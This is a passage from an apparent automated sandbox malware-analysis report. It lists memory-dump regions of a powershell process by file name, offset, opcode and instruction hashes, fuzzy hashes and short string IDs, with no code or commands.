                      • Instruction Fuzzy Hash: B6724EB4B00204DFDB14CBA9C995B6EB7F2AF8A304F248169D9099F356CB71ED42CB51
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2479687000.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: (f^l$(f^l$(f^l$(f^l$tLPk
                      • API String ID: 0-4019391526
                      • Opcode ID: 230fb02d726b1f82bf8573a299f34e95ce92e7a6ad2e308097ee76f657d89f4b
                      • Instruction ID: a933697aa61772b7e2fa8f4d39832775334e73934db97bdf1ec15cf8a08fe632
                      • Opcode Fuzzy Hash: 230fb02d726b1f82bf8573a299f34e95ce92e7a6ad2e308097ee76f657d89f4b
                      • Instruction Fuzzy Hash: B8525DB4B00205DFDB20CB55D985BA9B7B2BF8A314F24C169D9099B352CB72ED42CF51
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2479687000.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: (f^l$(f^l$x.Ok$x.Ok$-Ok
                      • API String ID: 0-21961828
                      • Opcode ID: 79907b01294526c5930c0b7e6ee4626c687cb96aaa434715eed90f5e31780fa1
                      • Instruction ID: 3693eae4c3439101ab69c154ca17d6741d36a87b0b08498dcbb0684b74c74abc
                      • Opcode Fuzzy Hash: 79907b01294526c5930c0b7e6ee4626c687cb96aaa434715eed90f5e31780fa1
                      • Instruction Fuzzy Hash: 95F181B0A002159FEB24DB68CD51F6E7BF3AB95304F1084A9EA09AF391CB75DD818B51
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2479687000.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: (f^l$(f^l$(f^l$tLPk
                      • API String ID: 0-4166803919
                      • Opcode ID: d5ede44624d3f2cf079e74148b35b101577bd4e05aa3b7f4e1b70b6dc17b413f
                      • Instruction ID: 0e3f66c85388f33bcb9f0ddfbffdc095e48a2dae36fcc9d755bde16c94ae873a
                      • Opcode Fuzzy Hash: d5ede44624d3f2cf079e74148b35b101577bd4e05aa3b7f4e1b70b6dc17b413f
                      • Instruction Fuzzy Hash: E3327DB4A00205DFDB20CB55D985FAEB7B2AF85304F248169E9159B392CB72ED42CF51
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2479687000.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: (f^l$(f^l$x.Ok
                      • API String ID: 0-1850434022
                      • Opcode ID: d70bbd6133a4532ab7525252a805aa7a7b2c4d59ea00b162f8256603f16c88d6
                      • Instruction ID: d4878061b279c1d4f849de98b37f3f523927da0f9989413d2abd38c568eacf09
                      • Opcode Fuzzy Hash: d70bbd6133a4532ab7525252a805aa7a7b2c4d59ea00b162f8256603f16c88d6
                      • Instruction Fuzzy Hash: B29141B0B002049FDB14DB64C955BAEBBF3AB8A314F108068E605BF795CB75ED41CB61
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2479687000.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: x.Ok$-Ok
                      • API String ID: 0-3458450161
                      • Opcode ID: 27306aca86e342a03fd4ca977afaa626b878b2cf130f3f2c5bba7093b6e378f9
                      • Instruction ID: 9c6bbc8c2aa60f39aa44cd94e70bb7af27ba253c93d6e05c20abf782b4775ef2
                      • Opcode Fuzzy Hash: 27306aca86e342a03fd4ca977afaa626b878b2cf130f3f2c5bba7093b6e378f9
                      • Instruction Fuzzy Hash: A692C6B1B00215CFDB24DB69C890BAEBBF2BF86314F1480AAD5059B355DB35DE41CBA1
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2479687000.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 84\l$84\l
                      • API String ID: 0-2576501996
                      • Opcode ID: 2a994f4219c7cdd74bccc3a18ce75b1b5d009f4ec8c3e7f7ad296653b2f24018
                      • Instruction ID: 0e488193700dc00997011618619fdaa3a379f710e51da22b1b416972a8a06d8b
                      • Opcode Fuzzy Hash: 2a994f4219c7cdd74bccc3a18ce75b1b5d009f4ec8c3e7f7ad296653b2f24018
                      • Instruction Fuzzy Hash: 73C1F6716043859FDB228B69C894766BFB1AFC6210F29C09BD944DF293CB35DD42C7A2
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2479687000.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: x.Ok$-Ok
                      • API String ID: 0-3458450161
                      • Opcode ID: 1f30c725505bbe17f41dc2ba94917f0fa0080184d497ffc12794fa6ea3c50264
                      • Instruction ID: 9e09e81d022512144369b05b9ad266ef91a1efec4fa38631f1c29b0be3aee199
                      • Opcode Fuzzy Hash: 1f30c725505bbe17f41dc2ba94917f0fa0080184d497ffc12794fa6ea3c50264
                      • Instruction Fuzzy Hash: 3BD162B0A00205DFD714DBA4C851B9EB7B3AF8A304F24C469EA157F395CB75DD428B91
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2479687000.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: x.Ok$-Ok
                      • API String ID: 0-3458450161
                      • Opcode ID: 019624d2ae347d4664744ec8a8d7ddb7e55f99830ccae4d7f52d2063cd8b8f41
                      • Instruction ID: bd292429937071b39892d3437f880a37af4f2d22313c128dee6bfed84bc39785
                      • Opcode Fuzzy Hash: 019624d2ae347d4664744ec8a8d7ddb7e55f99830ccae4d7f52d2063cd8b8f41
                      • Instruction Fuzzy Hash: 4AB180B0A002059FDB14DF94C891B9EBBB2EF8A304F14C059E9057F399CB75E942CB91
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2479687000.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: (f^l$x.Ok
                      • API String ID: 0-3235922341
                      • Opcode ID: 1cacfe9ab33ada521b4d7b95eb6c2fccb267c1011fbbfc8acdfb91d91a074f6b
                      • Instruction ID: 50870c71eabe54f9d832689da937edd1534f2b7364f78a6b449dd3ffb40ed762
                      • Opcode Fuzzy Hash: 1cacfe9ab33ada521b4d7b95eb6c2fccb267c1011fbbfc8acdfb91d91a074f6b
                      • Instruction Fuzzy Hash: 689181B0B012019FD714DB54C985B9EBBF2AF8A314F208069E505BF396CB76ED45CB61
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2450707412.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_4ed0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: iTk
                      • API String ID: 0-3169847613
                      • Opcode ID: ea85d81ea79fbb23ac39dd4e55dc1df31dd3bd5df7503781eef1e83c89af91d7
                      • Instruction ID: efb551bfa92d9078602a32babb5a39f8b61d326b70eec027cd72d8be2ef99eb4
                      • Opcode Fuzzy Hash: ea85d81ea79fbb23ac39dd4e55dc1df31dd3bd5df7503781eef1e83c89af91d7
                      • Instruction Fuzzy Hash: AA429070A05245DFCB05CF68C494AAEFBB1FF49314F25819AE844AB362C735EC46CBA1
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2479687000.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: x.Ok
                      • API String ID: 0-278779807
                      • Opcode ID: 1efe7e911798a7daf48c0253d78df1e5cf7d09bd66a0ec169ee48ab9843c1e84
                      • Instruction ID: 041cbc75cd176bb0c3e985525662e432b3b9b62bb5edcb943a594541b36034e3
                      • Opcode Fuzzy Hash: 1efe7e911798a7daf48c0253d78df1e5cf7d09bd66a0ec169ee48ab9843c1e84
                      • Instruction Fuzzy Hash: 23314F74B40214AFE7149BA4C855FAE7BB3AB96304F208428EA057F795CF75DC428BA1
                      Memory Dump Source
                      • Source File: 00000004.00000002.2450707412.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_4ed0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6e450eac70f89a28c7d8ace5eb57af6ad173ac3e1d48fd8b96d677f1a8bde112
                      • Instruction ID: 37428a7a3ac077662c26eb19eaec40a9066d9abcee6fb78c4365b95179b78216
                      • Opcode Fuzzy Hash: 6e450eac70f89a28c7d8ace5eb57af6ad173ac3e1d48fd8b96d677f1a8bde112
                      • Instruction Fuzzy Hash: 04124F34B001188FDB29DF74D8547AEBBB2AF89344F1044A9D509AB3A5DF35AD86CF90
                      Memory Dump Source
                      • Source File: 00000004.00000002.2450707412.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_4ed0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7d848f59d01a499dd60089681cad149dd2d75a249d767ce42e507d7621679523
                      • Instruction ID: 5e435942afb06afbaf8048fb301accc2abe31252aa5f57f83124b4af20e289d0
                      • Opcode Fuzzy Hash: 7d848f59d01a499dd60089681cad149dd2d75a249d767ce42e507d7621679523
                      • Instruction Fuzzy Hash: 42D13034A00218EFDB14CFA8D494A9DFBB1FF99314F249159E805AB395C735ED82CB90
                      Memory Dump Source
                      • Source File: 00000004.00000002.2450707412.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_4ed0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6b892fd4f57b21eaa9c1145306e2e7fdaa5f00d950100318c0dbe2237bbac5ef
                      • Instruction ID: 987292f0ae9886fe25f5326f4b9e6341a8c8c905a485cd4b457acb9498bfa053
                      • Opcode Fuzzy Hash: 6b892fd4f57b21eaa9c1145306e2e7fdaa5f00d950100318c0dbe2237bbac5ef
                      • Instruction Fuzzy Hash: B9C19C71B00248DFDB14DFA8D984A9DBBB6FF85318F118558E406AB366DB34EC4ACB50
                      Memory Dump Source
                      • Source File: 00000004.00000002.2450707412.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_4ed0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d7aa76dc9ad80b35e7d47f3041df393639b7d38541e6ee24aee7253332684d61
                      • Instruction ID: cc4725cde4bbb76510b5b41f461bf4bd1d3a7e6c2840d17887a7810d29028685
                      • Opcode Fuzzy Hash: d7aa76dc9ad80b35e7d47f3041df393639b7d38541e6ee24aee7253332684d61
                      • Instruction Fuzzy Hash: F0D1F674A00219EFDB14DF98D484A9DFBB2FF88314F288159E845AB355D731ED82CB91
                      Memory Dump Source
                      • Source File: 00000004.00000002.2479687000.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8784ddd488bcaf81bb2a2871dc3f1645fd16c399b272891a9e540b09c0e9a102
                      • Instruction ID: 06226c99afce4d97def5f57b59fddc4d58aa692399bfb73cb38f2785ba7e18b5
                      • Opcode Fuzzy Hash: 8784ddd488bcaf81bb2a2871dc3f1645fd16c399b272891a9e540b09c0e9a102
                      • Instruction Fuzzy Hash: 63A138B5B043068FDB259B79C85076A7BF2AF87204F1484AAD645CF392DB35CE41C7A2
                      Memory Dump Source
                      • Source File: 00000004.00000002.2450707412.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_4ed0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 54d926885a0bec0dba1c9287d529217eba069ba5f4313819776021bec05b889b
                      • Instruction ID: 32649da865e5cc3ecc7d6b3303e89fe2e41157ae4bc6aa212016712c5042276d
                      • Opcode Fuzzy Hash: 54d926885a0bec0dba1c9287d529217eba069ba5f4313819776021bec05b889b
                      • Instruction Fuzzy Hash: BCB17F70E00249CFDF10CFA8D8857EDBBF1AF88718F149529D816A7254EB74A846CF91
                      Memory Dump Source
                      • Source File: 00000004.00000002.2450707412.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_4ed0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 41431b52aade5f0b234df00334e83fb1657ed763ddd427c277a83c2d149348b5
                      • Instruction ID: f7f64bba8a61c4b351a3e42d11e785ea3cb5e6f27f58cb2478b894a2efef68c7
                      • Opcode Fuzzy Hash: 41431b52aade5f0b234df00334e83fb1657ed763ddd427c277a83c2d149348b5
                      • Instruction Fuzzy Hash: C1B16F70E00249CFDB14CFA8D8857DDBBF1BF48718F149529E816EB294EB74A846CB81
                      Memory Dump Source
                      • Source File: 00000004.00000002.2450707412.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_4ed0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5f69c0db701f9c476aaca04bf7a541d804d93b1fa6106b7bdc699848fdfaff81
                      • Instruction ID: 7b43e675856d3b6a181f7e82920c578e433588c3d3a65cf6ab16d1646201708e
                      • Opcode Fuzzy Hash: 5f69c0db701f9c476aaca04bf7a541d804d93b1fa6106b7bdc699848fdfaff81
                      • Instruction Fuzzy Hash: D8816C34A01244DFCB15DF78D8849AEBBF2FF89314F1884A9E455AB261C735ED46CB60
                      Memory Dump Source
                      • Source File: 00000004.00000002.2450707412.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_4ed0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d085176ba37f646ba8697efbfb4fa7c7559dbff67390f6bbf431e2c97a609f05
                      • Instruction ID: 4fac7991e66fb8411e1be98ef58ff1d1200950b9d0ba03325fb089b651321ca5
                      • Opcode Fuzzy Hash: d085176ba37f646ba8697efbfb4fa7c7559dbff67390f6bbf431e2c97a609f05
                      • Instruction Fuzzy Hash: 1771AE71A00209CFCB24DFA8D890A9DBBF6FF85314F148569D45ADB791DB35AC46CB80
                      Memory Dump Source
                      • Source File: 00000004.00000002.2450707412.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_4ed0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 40347df90b59eb8571a5f5ce3d9f00d4ca8f9107b341c70e587fabe5afbfd8cb
                      • Instruction ID: 2253736086de54ac316bb36bc89817e34e0169c327d99e619c1c26c3df983b7b
                      • Opcode Fuzzy Hash: 40347df90b59eb8571a5f5ce3d9f00d4ca8f9107b341c70e587fabe5afbfd8cb
                      • Instruction Fuzzy Hash: 53714D71A00209DFDB14DFB5D990BADBBF6FF88308F148569D412AB291DB35AC46CB50
                      Memory Dump Source
                      • Source File: 00000004.00000002.2450707412.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_4ed0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0611f557f578c30074f94931f97a0ff1526e6f5ede0bda163936d04012ce6a4a
                      • Instruction ID: 0b02b61e387f3bdec2ef4ae8ea8d3082d984c26d9e16c6bff5649541b190aba2
                      • Opcode Fuzzy Hash: 0611f557f578c30074f94931f97a0ff1526e6f5ede0bda163936d04012ce6a4a
                      • Instruction Fuzzy Hash: 5D716B70E00249DFDF14CFA8C8947DEBBF1AF88718F149129E416AB254EB74A846CF91
                      Memory Dump Source
                      • Source File: 00000004.00000002.2450707412.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_4ed0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a9dfbaac8c203e129fa188c01a24f0cb9dcfd4f149832ddaeb99211d05664e2a
                      • Instruction ID: f21cccdae340887c3a85b4da871da9aa7bcc5ce3fe33cc454545b48bb5be161f
                      • Opcode Fuzzy Hash: a9dfbaac8c203e129fa188c01a24f0cb9dcfd4f149832ddaeb99211d05664e2a
                      • Instruction Fuzzy Hash: 33716C70E00249DFDF14CFA9C8957DEBBF2AF88718F149129D416AB254EB74A842CF91
                      Memory Dump Source
                      • Source File: 00000004.00000002.2479687000.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: eed06f303674ef529f93ae4a65a65f2c6507e03abdcb03ee1104988e6e1744ce
                      • Instruction ID: 5946530c5fd16732da977341df1eadd2ced20ec7090b7368423596ef506096c4
                      • Opcode Fuzzy Hash: eed06f303674ef529f93ae4a65a65f2c6507e03abdcb03ee1104988e6e1744ce
                      • Instruction Fuzzy Hash: 64413AF4F003028FCF248F65C880B7A77E2AF85244F5884AAD905DB252DB39DE40CB56
                      Memory Dump Source
                      • Source File: 00000004.00000002.2450707412.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_4ed0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a0f5624a8ea8a54a0fcaf57ca50e112db0c72425791059b2808dc011b4361ca6
                      • Instruction ID: 1696947acf31d613c5ef946b9cece4f116cadc60acd3c7d5ce971e512f19f420
                      • Opcode Fuzzy Hash: a0f5624a8ea8a54a0fcaf57ca50e112db0c72425791059b2808dc011b4361ca6
                      • Instruction Fuzzy Hash: C5416B716002048FDB15DB64C968AAE7BF6EF89754F08506CE446EB7A1DF34AC41CB50
                      Memory Dump Source
                      • Source File: 00000004.00000002.2450707412.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_4ed0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e530de7850dae8bd2c4dd52752f39c402ae3ef899fd3b2a05d892f4956389569
                      • Instruction ID: 96d227f806a9b1a9c2bf69e20803d1f86553841b7e35bc3cd516939e1cb34ac3
                      • Opcode Fuzzy Hash: e530de7850dae8bd2c4dd52752f39c402ae3ef899fd3b2a05d892f4956389569
                      • Instruction Fuzzy Hash: A5415870A00219DFDB18DFA9C89469EBBF6FF85304F148529D406EB3A1DB74AC46CB50
                      Memory Dump Source
                      • Source File: 00000004.00000002.2479687000.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7c451d4b101d3d2a54c88a96e876eb36da55c4b22475bfc68732e7d2f4b6464d
                      • Instruction ID: 3541e175719f626ab1508e87c4aa5b31ff860e2f7e974e8f1b4962e78a0ad6a1
                      • Opcode Fuzzy Hash: 7c451d4b101d3d2a54c88a96e876eb36da55c4b22475bfc68732e7d2f4b6464d
                      • Instruction Fuzzy Hash: FE218EB13403169BE7205ABA48D0B3BB7DA9FC5311F24807AA706CB2C5CE35C981C361
                      Memory Dump Source
                      • Source File: 00000004.00000002.2479687000.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 28798c08fdb1944eb7f5dffe7905dfc2854bee2bdcafb1ec4b8203868bf29f5c
                      • Instruction ID: ee55b7dfca857c404c52130fe35323f646a1afd4e4fb8a0625a6713f93f01186
                      • Opcode Fuzzy Hash: 28798c08fdb1944eb7f5dffe7905dfc2854bee2bdcafb1ec4b8203868bf29f5c
                      • Instruction Fuzzy Hash: CD217DB271034A9BE734567B8C55B37B7EA5BC1350F38802BD585CB285CE75C9818361
                      Memory Dump Source
                      • Source File: 00000004.00000002.2450707412.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_4ed0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 98a82e2f10228504790e0d805a23b336c32cd59e07c6fcee49d031e29ed96706
                      • Instruction ID: 5e2a3707843afde1ea92e1ca265b97ffd8e870867c5f7fa8eb505d2e27fcc98a
                      • Opcode Fuzzy Hash: 98a82e2f10228504790e0d805a23b336c32cd59e07c6fcee49d031e29ed96706
                      • Instruction Fuzzy Hash: B7312E30B001188FCB29DB74C9516EEBBB2AF49348F2044E9D509AB351DB35AE86CF90
                      Memory Dump Source
                      • Source File: 00000004.00000002.2450707412.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_4ed0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9952a647acf624f50b50da16fb8ac169a389b5dce5c1de65e1c8692c4f575d41
                      • Instruction ID: 3e92aa037e381402392f84e929d1b6457f427cd2e48b5898f61e5d162e8f08a3
                      • Opcode Fuzzy Hash: 9952a647acf624f50b50da16fb8ac169a389b5dce5c1de65e1c8692c4f575d41
                      • Instruction Fuzzy Hash: 9C314C75A042459FCB05CF58C8949AAFBF1FF4A310B1541AAE848DB756C731FC42CBA1
                      Memory Dump Source
                      • Source File: 00000004.00000002.2479687000.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f2845914594a2706d2117c3ce2d83dd3cc1f044e8df1099cba5511d0d7ae3cc5
                      • Instruction ID: 7424297a2d2f2d78ca86b7c8417bcee3518c815a1330167db3f69ae00e17987b
                      • Opcode Fuzzy Hash: f2845914594a2706d2117c3ce2d83dd3cc1f044e8df1099cba5511d0d7ae3cc5
                      • Instruction Fuzzy Hash: D12127B13083CA9BE73117768895B667BA95F82350F3C4497E9C4CB287DA798A84C361
                      Memory Dump Source
                      • Source File: 00000004.00000002.2479687000.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a26cf770a694a8295f40bf879f5fcc784bf793c3f54c64c40bb3f241fb3c0f7a
                      • Instruction ID: 7bb01803c96f77523b4a06b66078ac176e19e4e77a79741bee1ec22d34537f4b
                      • Opcode Fuzzy Hash: a26cf770a694a8295f40bf879f5fcc784bf793c3f54c64c40bb3f241fb3c0f7a
                      • Instruction Fuzzy Hash: 62215BB17443566BE7204B6648D0B767BEA9F86310F18807BE644CB2C6CA79DAC4C372
                      Memory Dump Source
                      • Source File: 00000004.00000002.2479687000.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e22f5e2e44cdfcad3c4a1fe36c21a77735767e8d635a4e51e557bef73afcbfee
                      • Instruction ID: 117c04edf7f62d41213772576661781cd2f10b75940c0450f023390b6982cc64
                      • Opcode Fuzzy Hash: e22f5e2e44cdfcad3c4a1fe36c21a77735767e8d635a4e51e557bef73afcbfee
                      • Instruction Fuzzy Hash: D6012B7635031ACBC73455AAD44057AF7D9DBC2622F14C47FDA49C7640D632C985C762
                      Memory Dump Source
                      • Source File: 00000004.00000002.2450707412.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_4ed0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 95d7993085958e8438c0e4648ee14cd65b02012a3c48a9e26209deb24a57a285
                      • Instruction ID: 374f79aedf646345709c26e129481d7fbceef80a3a288b319bccdfdca59c4417
                      • Opcode Fuzzy Hash: 95d7993085958e8438c0e4648ee14cd65b02012a3c48a9e26209deb24a57a285
                      • Instruction Fuzzy Hash: 5511C870D00158DFEF24DBA4DD987ECB771AF4931EF142829C022B65A0EB7468CACB91
                      Memory Dump Source
                      • Source File: 00000004.00000002.2479687000.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ee420e40a25d35fead81364bfc51d090274a2b3e82af5358b9a340f81a5baadb
                      • Instruction ID: 6b2952b84c988ea57db753a07984f085de81daaa59c9161ea3127c86a3f17f03
                      • Opcode Fuzzy Hash: ee420e40a25d35fead81364bfc51d090274a2b3e82af5358b9a340f81a5baadb
                      • Instruction Fuzzy Hash: 9D01FEF2B4562057D33117780C1266F7B528BD575AB018079CE029F642CA758D1283E3
                      Memory Dump Source
                      • Source File: 00000004.00000002.2449825625.0000000004D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D2D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_4d2d000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 87002f7dbe6b24c149c26416820d4abfcf60cb838fb807816f8841f13502b4cc
                      • Instruction ID: 8ca71d5261c189b152c6d6d7878adfcca9a4eeccc59db8c3b743873b81494934
                      • Opcode Fuzzy Hash: 87002f7dbe6b24c149c26416820d4abfcf60cb838fb807816f8841f13502b4cc
                      • Instruction Fuzzy Hash: 85012B31204350EAE7104F25EF80B67FF98FF51328F18C01ADD484B256C278E845C6B1
                      Memory Dump Source
                      • Source File: 00000004.00000002.2449825625.0000000004D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D2D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_4d2d000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1b129faa0dc8bb0a985ff8defc2fb6207962f7dbd6309d19b7a3330000b4c14b
                      • Instruction ID: 1b9b620de1f93365bce924512d4172a2674310dbb7e444b4d154bdb55b0af42c
                      • Opcode Fuzzy Hash: 1b129faa0dc8bb0a985ff8defc2fb6207962f7dbd6309d19b7a3330000b4c14b
